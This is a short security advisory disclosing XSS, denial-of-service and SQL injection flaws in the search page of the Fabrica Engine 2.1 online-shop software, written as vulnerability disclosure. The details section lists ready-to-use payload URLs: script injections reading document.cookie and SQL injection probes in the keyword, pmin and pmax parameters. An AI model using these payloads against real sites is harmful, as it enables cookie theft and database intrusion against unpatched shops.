Fabrica Engine 2.1 Cross Site Scripting / Denial Of Service / SQL Injection

`Hello Bugtraq!  
  
I want to warn you about Cross-Site Scripting, Denial of Service and SQL  
Injection vulnerabilities in Fabrica Engine (which I found in 2008 and 2009  
at web site of one online shop). It's commercial engine for online shops.  
  
SecurityVulns ID: 11274.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Fabrica Engine 2.1 and previous versions.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/search/?keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://site/search/?pmin=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://site/search/?pmax=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
DoS (WASC-10):  
  
http://site/search/?keyword=  
  
SQL Injection (WASC-19):  
  
http://site/search/?pmin=1%20and%20version()=5%20limit%201/*&keyword=1  
  
http://site/search/?pmax=1%20and%20version()=5%20limit%201/*&keyword=1  
  
------------  
Timeline:  
------------  
  
2009-2010 - developers should be informed by admins of online shop, which I  
informed about these vulnerabilities in previous years.  
2010.11.29 - disclosed at my site.  
2010.11.30 - informed developers.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/4721/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`